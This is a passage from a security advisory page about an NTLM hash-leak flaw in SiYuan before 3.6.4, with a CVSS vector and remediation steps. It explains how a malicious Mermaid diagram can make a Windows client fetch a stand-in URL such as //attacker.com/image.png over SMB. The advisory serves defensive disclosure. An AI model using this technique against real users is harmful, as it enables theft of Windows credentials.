EUVD-2026-21148
GHSA-w95v-4h65-j455
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
4Description
SiYuan is a personal knowledge management system. Prior to 3.6.4, SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, <img> tags with src attributes survive Mermaid's internal DOMPurify and land in SVG <foreignObject> blocks. The SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL. On Windows, a protocol-relative URL (//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker. This vulnerability is fixed in 3.6.4.
Analysis
NTLM credential theft in SiYuan personal knowledge management system (prior to 3.6.4) allows remote attackers to capture Windows user password hashes without authentication or user interaction. Misconfigured Mermaid.js rendering with securityLevel:loose permits unsanitized <img> tags within SVG foreignObject blocks. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Remediation
Within 24 hours: Inventory all SiYuan deployments and verify installed versions; disable Mermaid diagram rendering in SiYuan settings if available. Within 7 days: Implement network-level blocking of outbound SMB (port 445) and NetBIOS (ports 137-139) traffic from SiYuan client systems to untrusted networks; restrict SiYuan note sharing to verified internal users only; force password reset for all Windows domain accounts that may have accessed SiYuan notes. …
Sign in for detailed remediation steps.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today